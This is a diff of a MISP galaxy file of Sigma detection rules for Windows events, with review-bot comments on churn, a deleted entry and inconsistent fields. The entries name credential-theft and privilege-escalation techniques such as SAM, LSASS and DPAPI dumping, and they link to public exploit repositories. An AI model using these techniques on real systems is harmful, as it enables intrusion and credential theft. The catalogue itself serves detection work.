@@ -26077,8 +33062,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" ], "tags": [ @@ -26086,6 +33071,15 @@ "attack.t1587" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "value": "Suspicious Word Cab File Write CVE-2021-40444" }, @@ -26134,6 +33128,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "value": "UAC Bypass Using IDiagnostic Profile - File" }, @@ -26159,6 +33162,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "value": "Suspicious Desktopimgdownldr Target File" }, @@ -26184,6 +33196,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "value": "UAC Bypass Using Consent and Comctl32 - File" }, 
@@ -26200,11 +33221,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0/CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://github.com/HuskyHacks/ShadowSteal", - "https://github.com/search?q=CVE-2021-36934", "https://github.com/FireFart/hivenightmare", + "https://github.com/cube0x0/CVE-2021-36934", + "https://github.com/search?q=CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ 
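Review bot: The `@@ -26200,11 +33221,11 @@` hunk only permutes the five `refs` of file_event_win_sam_dump.yml (the hivenightmare, cube0x0, github-search and google-search URLs) without adding or removing anything, and the same permutation-only change recurs in most hunks of this file, which suggests the generator serialises refs from an unordered collection. Every regeneration then produces review noise that buries the substantive changes in the same diff (new `related` blocks, renamed `value` strings, a deleted entry). I'd have the generator keep the upstream Sigma rule's `references` order, or sort the list before appending the SigmaHQ link, so that an unchanged rule yields a byte-identical entry; the generator itself is not part of this diff, so the exact change is inferred.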
@@ -26212,36 +33233,17 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "value": "SAM Dump File Creation" - }, - { - "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", - "meta": { - "author": "omkar72, oscd.community, Wojciech Lesicki", - "creation_date": "2020/10/12", - "falsepositive": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" - ], - "filename": "file_event_win_susp_clr_logs.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1218" - ] - }, - "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", - "value": "Suspicious CLR Logs Creation" + "value": "Potential SAM Database Dump" }, { "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", 
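Review bot: This hunk deletes the whole "Suspicious CLR Logs Creation" entry (uuid `e4b63079-6198-405c-abd7-3fe8b0ce3263`) instead of retiring it, and renames the SAM entry's `value` from `SAM Dump File Creation` to `Potential SAM Database Dump` while keeping its uuid. In a MISP galaxy the `value` is what appears in the `misp-galaxy:sigma-rules="…"` tag string, so events already tagged with either old value stop resolving to a cluster, and the removed uuid has nothing left to resolve to at all. If this galaxy follows the convention used elsewhere in misp-galaxy of keeping uuids stable, the dropped rule should remain as a stub carrying `"revoked": true` (presumably upstream Sigma moved or renamed file_event_win_susp_clr_logs.yml — worth confirming), and value renames should be listed in the commit message so downstream tag mappings can be updated. The refs reordering in the same hunk is pure churn that makes these two substantive changes easy to miss.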
@@ -26290,6 +33292,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", "value": "UAC Bypass Using MSConfig Token Modification - File" }, @@ -26339,6 +33350,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "value": "EVTX Created In Uncommon Location" }, @@ -26355,10 +33375,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/WiredPulse/Invoke-HiveNightmare", - "https://github.com/FireFart/hivenightmare/", - "https://github.com/GossiTheDog/HiveNightmare", "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/GossiTheDog/HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" ], "tags": [ @@ -26392,6 +33412,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "value": "UAC Bypass Abusing Winsat Path Parsing - File" }, @@ -26416,6 +33445,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", "value": "QuarksPwDump Dump File" }, 
@@ -26432,9 +33470,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" ], "tags": [ @@ -26442,6 +33480,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", "value": "Suspicious VHD Image Download From Browser" }, @@ -26467,6 +33514,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "value": "UAC Bypass Using IEInstal - File" }, @@ -26491,6 +33547,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", "value": "ScreenConnect Temporary Installation Artefact" }, @@ -26520,6 +33585,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "value": "Potential Initial Access via DLL Search Order Hijacking" }, 
@@ -26544,6 +33618,15 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "value": "Suspicious Creation with Colorcpl" }, @@ -26567,6 +33650,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", "value": "Hijack Legit RDP Session to Move Laterally" }, @@ -26592,7 +33684,7 @@ ] }, "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "value": "Persistence Via Notepad++ Plugins" + "value": "Potential Persistence Via Notepad++ Plugins" }, { "description": "Detects windows executables that writes files with suspicious extensions", @@ -26637,6 +33729,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "value": "LSASS Memory Dump File Creation" }, 
@@ -26653,10 +33754,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" ], "tags": "No established tags" @@ -26686,6 +33787,15 @@ "cve.2022.24527" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", "value": "CVE-2022-24527 Microsoft Connected Cache LPE" }, @@ -26738,6 +33848,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "297afac9-5d02-4138-8c58-b977bac60556", "value": "Creation of an Executable by an Executable" }, 
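Review bot: In the `@@ -26653,10 +33754,10 @@` hunk the iso_file_recent entry still carries `"tags": "No established tags"` — a string — while every other entry in this file has `tags` as an array (e.g. `"tags": [ "attack.t1587.001" ]` two hunks below). A consumer that iterates `meta.tags` to derive ATT&CK relations will either walk the characters of that sentinel or fail on the type change, which is plausibly why this entry is the only one in the hunk that receives no `related` block. The generator should emit `"tags": []` (or omit the key) for rules without tags, and the same applies to any other place it substitutes a prose placeholder for an empty list; the commit does not touch this line, but it is on the new side and will be regenerated the same way next time.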
@@ -26778,9 +33897,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://github.com/fox-it/LDAPFragger", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" ], "tags": [ @@ -26788,6 +33907,15 @@ "attack.command_and_control" ] }, + "related": [ + { + "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "value": "Suspicious ADSI-Cache Usage By Unknown Tool" }, @@ -26804,8 +33932,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/Sam0x90/status/1552011547974696960", "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://twitter.com/Sam0x90/status/1552011547974696960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" ], "tags": [ @@ -26837,6 +33965,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" }, 
@@ -26912,6 +34049,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "value": "Suspicious Get-Variable.exe Creation" }, @@ -26936,6 +34082,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "value": "WerFault LSASS Process Memory Dump" }, @@ -26961,6 +34116,15 @@ "attack.t1528" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", "value": "Suspicious File Event With Teams Objects" }, @@ -26985,6 +34149,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "value": "Writing Local Admin Share" }, @@ -27009,6 +34182,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", "value": "SCR File Write Event" }, @@ -27033,6 +34215,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", "value": "CrackMapExec File Creation Patterns" }, 
@@ -27057,6 +34248,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", "value": "Legitimate Application Dropped Archive" }, @@ -27073,11 +34273,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/Wh04m1001/SysmonEoP", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ @@ -27114,6 +34314,15 @@ "attack.t1021.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "value": "Wmiprvse Wbemcomn DLL Hijack - File" }, @@ -27138,6 +34347,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d604714-e071-49ff-8726-edeb95a70679", "value": "Legitimate Application Dropped Script" }, 
@@ -27155,6 +34373,8 @@ "logsource.product": "windows", "refs": [ "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "http://addbalance.com/word/startup.htm", + "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" ], "tags": [ @@ -27162,6 +34382,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "value": "Creation In User Word Startup Folder" }, @@ -27211,6 +34440,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "value": "Rclone Config File Creation" }, @@ -27227,8 +34465,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1552932770464292864", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://twitter.com/cyb3rops/status/1552932770464292864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ 
@@ -27279,8 +34517,8 @@ "logsource.category": "file_rename", "logsource.product": "windows", "refs": [ - "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" ], "tags": [ @@ -27288,6 +34526,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "value": "Suspicious Appended Extension" }, @@ -27359,6 +34606,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", "value": "Deletes Backup Files" }, @@ -27384,6 +34640,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "value": "Sysinternals SDelete File Deletion" }, @@ -27408,6 +34673,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", "value": "Delete Log from Application" }, 
@@ -27431,6 +34705,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "value": "Prefetch File Deletion" }, @@ -27447,8 +34730,8 @@ "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" ], "tags": [ @@ -27459,6 +34742,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "value": "Windows Spooler Service Suspicious File Deletion" }, @@ -27523,8 +34815,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" ], "tags": [ @@ -27532,6 +34824,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "value": "Credential Manager Access" }, 
@@ -27548,8 +34849,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" ], "tags": [ @@ -27557,6 +34858,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", "value": "Suspicious Access To Windows DPAPI Master Keys" }, @@ -27585,6 +34895,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", "value": "Browser Credential Store Access" }, @@ -27601,8 +34920,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" ], "tags": [ 
@@ -27610,6 +34929,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "value": "Suspicious Access To Windows Credential History File" }, @@ -27658,9 +34986,52 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "value": "File Creation Date Changed to Another Year" }, + { + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_lolbin_appinstaller.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppX Package Installation Attempts Via AppInstaller" + }, { "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", "meta": { 
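Review bot: The re-added AppInstaller entry keeps uuid `7cff77e1-9663-46a3-8260-17f2e1aa9d0a` but its last `refs` element now points at `https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml`; the link it replaces (`dns_query_win_lobas_appinstaller.yml`, removed in a later hunk) is exactly the kind of `master`-branch URL that went dead when upstream renamed the file. Every entry's final ref follows the same `tree/master` pattern, so anyone following it after Sigma moves or renames a rule gets a 404 with no way back to the rule the description refers to. I'd have the generator pin these to the upstream commit it was run against, e.g. `https://github.com/SigmaHQ/sigma/blob/<sha>/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml`, and record that sha once in the galaxy's metadata so the cluster can be reproduced; the generator is outside this diff, so the shape of that change is inferred.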
@@ -27682,6 +35053,15 @@ "attack.t1554" ] }, + "related": [ + { + "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "value": "DNS HybridConnectionManager Service Bus" }, 
@@ -27706,34 +35086,18 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "065cceea-77ec-4030-9052-fc0affea7110", "value": "DNS Query for Anonfiles.com Domain" }, - { - "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_lobas_appinstaller.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", - "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "value": "AppInstaller Attempts From URL by DNS" - }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team 